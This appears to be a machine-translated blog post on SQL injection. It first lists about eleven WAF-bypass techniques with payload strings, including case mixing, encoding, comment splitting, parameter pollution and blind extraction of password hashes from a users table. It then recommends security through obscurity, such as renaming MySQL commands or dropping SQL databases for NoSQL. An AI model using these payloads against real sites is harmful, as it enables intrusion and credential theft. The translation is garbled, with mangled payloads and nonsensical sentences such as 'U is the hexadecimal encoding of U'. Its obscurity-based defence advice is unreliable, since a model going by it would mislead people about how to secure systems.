Deep thoughts on SQL Injection Attack Defense

After all the system security defenses are completed, I am afraid SQL injection, cross-site attacks, and other web Application Layer defenses are left behind. This is also the most troublesome thing for the majority of webmasters.Security treasure Architecture Technical speculation and advanced network security defense"Explains one of the simplest high-performance defense methods. You can handle most of the attacks with slight modifications based on your own situation. But is everything okay?
First, let's review how the online cool man broke through waf defense:
1.Case-insensitive Bypass
Everyone is familiar with this. It has a significant effect on some junk WAF. For example, if union is intercepted, the Union UnIoN is used to bypass it.
2.Simple code Bypass
For example, if the WAF keyword is detected, we can make it impossible to detect it. For example, if union is detected, we use U, which is the hexadecimal encoding of U, instead of U. union is written as UnION, and some WAF can be bypassed in combination with Case sensitivity, you can replace one or more of them at will.
In addition, during Mysql injection, for example, when the table name or load file is used, the file name or representation is used to bypass WAF in hexadecimal encoding.
3.Annotation Bypass
This case is rare. WAF only filters out a dangerous statement and does not block our entire query.
01 ./? Id = 1 + union + select + 1, 2, 3 unionselect + 1, 2, 3, 3, 4...
As you can see, as long as we put the sensitive word in the comment, note that we need to add one before!
4.Separated rewrite Bypass
The above example is applicable to the situation where WAF uses regular expressions and detects all sensitive words, regardless of where you write them. If you have a few words, filter them.
We can separate sensitive words through annotations, so that the WAF regular expression does not work, but the query results are not affected.
01 ./? Id = 1 + union + select + 1, 2, 3 --
As for rewrite bypass, it is applicable to scenarios where WAF filters once. Like the principle of uploading aaspsp horse, we can write something similar to Ununionion. After filtering a union operation, our query will be executed.
01 .? Id = 1 ununionion select 1, 2, 3 --
5. HttpParameter pollution (HPP)
For example, we have the following statement:
01 ./? Id = 1 union select + 1, 2, 3 + from + users + where + id = 1 --
We can repeat the previous id value and add our value to bypass it. & id = will become a comma during query:
01 ./? Id = 1 union select + 1 & id = 2, 3 + from + users + where + id = 1 --
There are many conditions for success in this case, depending on the specific WAF implementation.
An example is provided to illustrate the usage:
01 ./? Id = 1 unionselectpwdfromusers--
The specific analysis involves compiling the background code of the query statement.
For example, the server writes:
01. select * from table where a = ". $ _ GET ['a']. "and B = ". $ _ GET ['B']. "limit ". $ _ GET ['C'];
Then we can construct the following injection statement:
01 ./? A = 1 + unionselect + 1, passfrom + users --
The final Parsing is as follows:
01. select * from table where a = 1 unionselect 1, passfrom users --
As you can see, this method is more suitable for white box testing, while black box penetration is troublesome to use. But you can try it.
6. Use the logical operator or/and to bypass
01 ./? Id = 1 + OR + 0x50 = 0x50
02 ./? Id = 1 + and + ascii (lower (mid (select + pwd + from + users + limit +),) = 74
By the way, let's explain the second sentence. from the brackets in the bottom, select + pwd + from + users + limit + queries the first record of the pwd field from the users table, for example, admin,
Then mid (previous sentence), is the first character of admin, that is,,
Lower (previous sentence) converts the character to lowercase,
Then, ascii is to convert a to an ascii code, and the wait value is not 74.
7.Comparison operator replacement
Including! = Not equal to, <> not equal to, <less than,> greater than, can be used to replace = to bypass.
For example, in the previous example, to determine whether it is 74, if it is = filtered, we can determine whether it is greater than 73, whether it is less than 75, and then we will know that it is 74 .. Many WAF will forget this.
8.Function replacement with the same function
Substring () can be replaced by mid () and substr () functions, which are used to take a certain character of a string.
Ascii () encoding can be replaced by hex (), bin (), that is, hexadecimal and binary encoding. Benchmark () can be replaced by sleep (). The two are used in latency-based blind injection and will be introduced to you.
If these are blocked, there is a new method:
01.Substring (select 'Password'), 1, 1) = 0x70
02. substr (select 'Password'), 1, 1) = 0x70
03. mid (select 'Password'), 1, 1) = 0x70
For example, the values of the first character are determined from the password, which can be used:
01. strcmp (left ('Password', 1), 0x69) = 1
02. strcmp (left ('Password', 1), 0x70) = 0
03. strcmp (left ('Password', 1), 0x71) =-1
Left is used to take the value of the first digit from the left of the string, and strcmp is used to compare two values. If the comparison result is equal, it is 0, and the left is-1; otherwise, it is 1.
The group_concat and concat and concat_ws mentioned in the previous articles can also be replaced with each other.
9.No need for blind injection or and
For example, there is an injection point:
01. index. php? Uid = 1, 123
And, or is filtered out. In fact, there is a more direct method. We can directly modify 123 to generate for our statement:
01. index. php? Uid = strcmp (left (select + hash + from + users + limit + 123), 1), 0x42) +
In 123, the page is correct. Now we are blindly guessing the first hash. if the first is 0x42 or B, then the strcmp result is 0, 0 + 123 = 123, therefore, the page should be correct. Otherwise, it means that it is not B. In this way, you can guess that and or are not used.
10.Brackets
01 ./? Id = 1 + union + (select + 1, 2 + from + users)
For example, the above line is intercepted by WAF. Try to add some parentheses:
01 ./? Id = 1 + union + (select + 1, 2 + from + xxx)
02 ./? Id = (1) union (select (1), mid (hash, 1, 32) from (users ))
03 ./? Id = 1 + union + (select '1', concat (login, hash) from + users)
04 ./? Id = (1) union (select (1), hex (hash) from (users ))))))))
05 ./? Id = (1) or (0x50 = 0x50)
11.Buffer overflow Bypass
This is from a foreign blog:
01. id = 1 and (select 1) = (Select 0 xaaaaaaaaaaaaaaaaaaa) + UnIoN + SeLeCT +, version (), database (), user (),
8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26
02., 27,28, 29,30, 31,32, 33,34, 35,36-+
0xaaaaaaaaaaaaaaaaaaaaaaa the more A, the better. Generally, more than 1000.
The above is the breakthrough method widely used on the Internet. I don't have time to try it, and I don't want to try it. Here is a question: why are there thousands of vulnerabilities, attack methods, and defenses, is there a fundamental solution to all known and unknown vulnerability attacks?
In the final analysis, the linux win mysql we use is developed by others. It is not your own business. The advantage of open source is that you can use it, but you cannot keep it confidential! To solve the problem, we have to start with software and system development. Even simple secondary development can defend against many attacks:
1. If you can perform secondary development on mysql, simply rename all the select union commands and change them to only the names that nobody knows. Are you worried about SQL injection?
2. If I perform secondary development on mysql and change the SQL standard and logic, are you still afraid of or and injection?
3. If I define my own development language, I don't need c php. Are you afraid of any benefits?
4. Do you still fear hacker intrusion when customizing and transforming linux to put all the commands and system calls through secondary development? People don't even know how to get the ls command!
Despite violating the open-source spirit, many closed-source software and firewalls have been doing this for a long time. To put it bluntly, the secret, the safest, and self-created stuff are the most reliable, after all, you can customize changes and expand development at will! Of course, without this technical condition, we can do this to let hackers crash to the end!
1. Abandon mysql, mongodb, and other databases with SQL Injection risks. Use redis or other simple nosql databases that can meet your current business needs logic and trigger functions, please use lua php to clear all useless functions. Just as with linux permissions, everything will be granular and useless!
2. For the current linux system, such as nginx apache, the source code is simply modified. If the core function algorithm cannot be changed, the command name and user ui interface cannot be changed? For example, the select command of mysql and various corresponding encoding call names should be removed. Where can I use SQL injection?
Well, I hope you can refer to it. Do not change the system to anything you can't even use it on your own. Support for open source, instead of staying at the usage layer. We still need to work hard to become an open source software developer, you can also give your own innovative suggestions. Do not blindly follow the trend in anything. If you use it, you can also use it. If it is enough, it is a simple and profound philosophy!